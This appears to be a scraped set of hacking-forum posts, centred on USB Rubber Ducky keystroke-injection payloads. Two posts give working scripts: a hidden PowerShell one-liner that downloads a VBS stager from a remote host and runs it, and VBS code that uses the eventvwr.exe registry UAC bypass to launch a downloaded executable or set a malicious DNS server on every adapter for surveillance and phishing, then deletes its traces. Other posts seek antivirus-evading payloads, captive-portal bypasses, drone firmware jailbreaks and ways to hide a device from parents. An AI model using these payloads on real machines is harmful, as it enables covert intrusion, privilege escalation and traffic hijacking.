Search the Community

Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie

Well, it seems the conversation over at MavicPilots.com on discussing Jailbreaking, Height Restriction Bypass, and g_config changes, or anything related to "modding" DJI firmware settings for NFZ, etc is just out of pocket per the admins. They've been deleting threads left and right. Update: For those of you that are more active... stop by and see us in slack. Don't come ask dumb questions! Stop by with the mindset of participation. Updated slack invite link: https://join.slack.com/t/dji-rev/shared_invite/enQtMjk5OTEyMzcyMjI3LTdlZjY4NzQ5M2M2NmE5ZWM4OTgyNThmZDVmZjdjODE4ODYyNmYwZjYxMDcyYzcxNmZlYzI5ZjI2ZGQ2NGY1ZTc MavicPilots History on the Drama Llama: "So this has turned into a communist forum!!" “Mods continuing to delete posts will be a quick downward spiral for this forum and become a wasteland in no time” https://archive.fo/tfZEg#selection-957.1-957.44 I wanna talk about patching the dji_flight binary, anyone game? How about the best way to edit parameters, set better min, and max values, etc. ? Who's got root? Lets talk about what you do *after* you Jailbreak your DJI Spark, or Jailbreak your DJI Mavic, or Jailbreak your DJI Phantom4 (P4), what is next? $ adb shell root@wm100_dz_ap0001_v5:/ # root@wm220_dz_ap0002_v1:/ # root@wm220_dz_rp0010_v1:/ # root@wm220_dz_ah0001_v5:/ # How about you guys getting down and funky inside the DJI Assistant application? I see you! Come holla! I see you out there playing with web sockets... no lie, come talk with us! Lets all make a better place to discuss getting root and having fun with our DJI products. That *other* place is a bit stuffy. ;)

Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 😄

Hi, i try to bypass my pfsense captive portal. Have someone a working Solution? Thanks, Daniel

This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie

UAC RUBBER DUCKY ENCODER AND GENERATOR NOW IN PYTHON 3 I would like to begin by giving a shout out to Skiddie the original creator of UAC-ducky generator implemented in python 2. I used his work in order to re-write the script so it now works for python 3. I have tested the script and it works for the option 1 and 2 perfectly. Option 3 and 4 works but I have no way of not testing whether it works on a rubber ducky because I no longer have access to a rubber ducky. For those who have the rubber ducky feel free to test option 3 and 4. You can find a video on how the offline mode works at Skiddie's youtube channel https://www.youtube.com/watch?v=X1uS0ELBJvI For the original UAC-Ducky generator produced by Skiddie checkout https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky/blob/master/uac-duck.py You can also find a write up on how it works as well as Demo videos. For the one written in python 3 you can find it here. https://github.com/EgbieAndersonUku1/rubber_ducky/blob/master/rubber_ducky_UAC_3.0.py

Hi I'm new and just got my Rubber Ducky. Why can't I bypass UAC? Am I doing something wrong? It pops up with the UAC password prompt screen. "Do you want to allow the following program to make changes to this computer?" and then it asks for the password. Here's the code I'm using. GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds This doesn't work either DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER I'm running Windows 7 SP1

I currently need information as how to spoof my DHCP Name I am already spoofing my MAC address but the name appears as my computer name and the admin (parents) reset it. If I continue with it I will have multiple duplicates of my computers name. Which will end in extreme suspicion. I only need to make the name be "Network Device" for we already have 3 of those and won't look suspicious at all. I am full admin of my computer I do have it password protected so no one but me will access it. I only need the spoof for random occurrences. Simply for the fact if I used it too often I would get caught. Thanks for any help.